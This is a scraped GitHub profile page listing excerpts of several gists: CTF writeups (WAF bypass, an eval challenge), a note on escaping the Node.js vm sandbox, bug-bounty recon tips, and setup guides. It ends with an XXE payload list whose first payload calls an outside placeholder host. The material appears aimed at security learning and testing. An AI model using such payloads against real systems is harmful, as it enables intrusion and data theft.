Skip to content

Instantly share code, notes, and snippets.

View CaptainFreak's full-sized avatar
💣
Pwning

Shoeb Patel CaptainFreak

💣
Pwning
186 followers · 188 following
View GitHub Profile
@dims
dims / README.md
Last active April 30, 2024 11:52
Kubernetes Resources
@terjanq
terjanq / README.md
Last active October 23, 2021 14:18
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@n-ari
n-ari / BeginnersMisc.md
Last active July 12, 2020 14:04
Beginner's Misc writeup

Beginner's Misc

The problem is:

exploit = input('? ')
if eval(b64encode(exploit.encode('UTF-8'))) == math.pi:
  print(open('flag.txt').read())
@jcreedcmu
jcreedcmu / escape.js
Created February 19, 2018 18:09
Escaping nodejs vm
////////
// The vm module lets you run a string containing javascript code 'in
// a sandbox', where you specify a context of global variables that
// exist for the duration of its execution. This works more or less
// well, and if you're in control of the code that's running, and you
// have a reasonable protocol in mind// for how it expects a certain
// context to exist and interacts with it --- like, maybe a plug-in
// API for a program, with some endpoints defined for it that do
// useful domain-specific things --- your life can go smoothly.
@memogarcia
memogarcia / github_bugbountyhunting.md
Created October 7, 2017 08:27 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@estorgio
estorgio / Mounting VirtualBox shared folders on Ubuntu Server 16.04 LTS.md
Last active March 8, 2024 17:34
Mounting VirtualBox shared folders on Ubuntu Server 16.04 LTS

Update 28 July 2019: An updated version of this guide for Ubuntu Server 18.04 LTS is now available. Feel free to check it out.

Update 23 May 2020: This guide is ALREADY OUTDATED and might no longer work with new versions of Ubuntu and VirtualBox. Please consider switching to the updated guide instead. I will no longer respond to the replies to this gist. Thank you.

Mounting VirtualBox shared folders on Ubuntu Server 16.04 LTS

This guide will walk you through steps on how to setup a VirtualBox shared folder inside your Ubuntu Server guest. Tested on Ubuntu Server 16.04.3 LTS (Xenial Xerus)

@DavidWells
DavidWells / aligning-images.md
Last active April 25, 2024 10:57
Guide to aligning images in github readme.md files. https://davidwells.io/snippets/how-to-align-images-in-markdown

Aligning images

This is a guide for aligning images.

See the full Advanced Markdown doc for more tips and tricks

left alignment

@staaldraad
staaldraad / XXE_payloads
Last active April 29, 2024 14:27
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>